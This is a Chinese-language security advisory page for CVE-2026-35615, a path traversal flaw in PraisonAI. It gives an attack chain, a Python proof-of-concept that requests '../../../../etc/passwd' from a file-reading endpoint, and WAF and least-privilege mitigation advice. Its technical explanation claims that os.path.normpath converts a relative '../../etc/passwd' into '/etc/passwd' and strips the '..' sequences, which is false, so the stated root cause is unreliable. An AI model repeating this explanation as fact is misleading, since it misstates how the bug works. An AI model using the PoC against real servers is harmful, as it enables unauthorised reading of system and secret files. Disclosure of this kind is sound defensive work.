CVE-2026-35615 CVSS 7.5 高危

CVE-2026-35615 PraisonAI路径遍历漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35615

漏洞类型

路径遍历

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PraisonAI

漏洞概述

PraisonAI 在 1.5.113 之前的版本中存在严重的路径遍历漏洞。漏洞源于路径验证函数 `_validate_path()` 的逻辑缺陷，该函数先调用 `os.path.normpath()` 对路径进行标准化处理，折叠了 `..` 序列，随后才检查路径中是否包含 `..`。由于检查操作滞后，导致安全校验完全失效。攻击者可利用此缺陷无需身份验证即可绕过限制，读取服务器上的任意文件，造成高机密性风险。

技术细节

该漏洞的根本原因是代码逻辑顺序错误，属于典型的安全校验绕过问题。在受影响的 PraisonAI 版本中，负责文件路径验证的 `_validate_path()` 函数存在严重的实现缺陷。该函数首先调用了 Python 标准库的 `os.path.normpath()` 方法对用户输入的路径字符串进行标准化处理。`os.path.normpath()` 的作用是解析并消除路径中的冗余部分，例如将 `../../etc/passwd` 解析为绝对路径 `/etc/passwd`，因此其中的 `..` 序列会被移除。

随后，代码试图在标准化后的路径字符串中查找 `..` 子串，以此作为判断是否存在路径遍历攻击的依据。然而，由于检查操作是在标准化之后进行的，此时路径中已经不存在 `..` 字符，导致安全检查永远通过。这种“先清洗、后检查”的逻辑完全违背了安全原则。攻击者无需任何身份认证，只需发送包含多层 `../` 的恶意请求，即可轻易绕过验证，直接访问并读取服务器文件系统中的任意敏感文件，严重威胁系统机密性。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行的是 PraisonAI 且版本低于 1.5.113。

STEP 2

漏洞探测

攻击者向受影响端点发送包含 `../` 序列的特制请求，试图探测是否存在路径遍历。

STEP 3

绕过验证

服务器端 `_validate_path()` 函数先调用 `os.path.normpath()` 移除了 `../`，随后的检查因找不到 `..` 而通过，导致恶意路径被接受。

STEP 4

数据窃取

攻击者成功读取服务器上的任意敏感文件（如配置文件、密钥或源代码），获取高机密性信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual vulnerable endpoint)
target_url = "http://localhost:8000/api/read_file"

# Malicious payload exploiting path traversal
# The application normalizes "../../../etc/passwd" to "/etc/passwd"
# then checks for ".." which no longer exists, allowing the read.
payload = {
    "file_path": "../../../../etc/passwd"
}

try:
    response = requests.get(target_url, params=payload)
    
    # Check if the response contains file content
    if response.status_code == 200:
        print("[+] Exploit successful! File content retrieved:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

PraisonAI < 1.5.113

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界部署 Web 应用防火墙（WAF），配置规则拦截包含 `../` 或 `%2e%2e/` 等路径遍历特征的恶意请求。同时，严格限制运行 PraisonAI 服务的操作系统账户权限，避免使用 root 或高权限用户运行服务，以防止攻击者读取系统级敏感文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表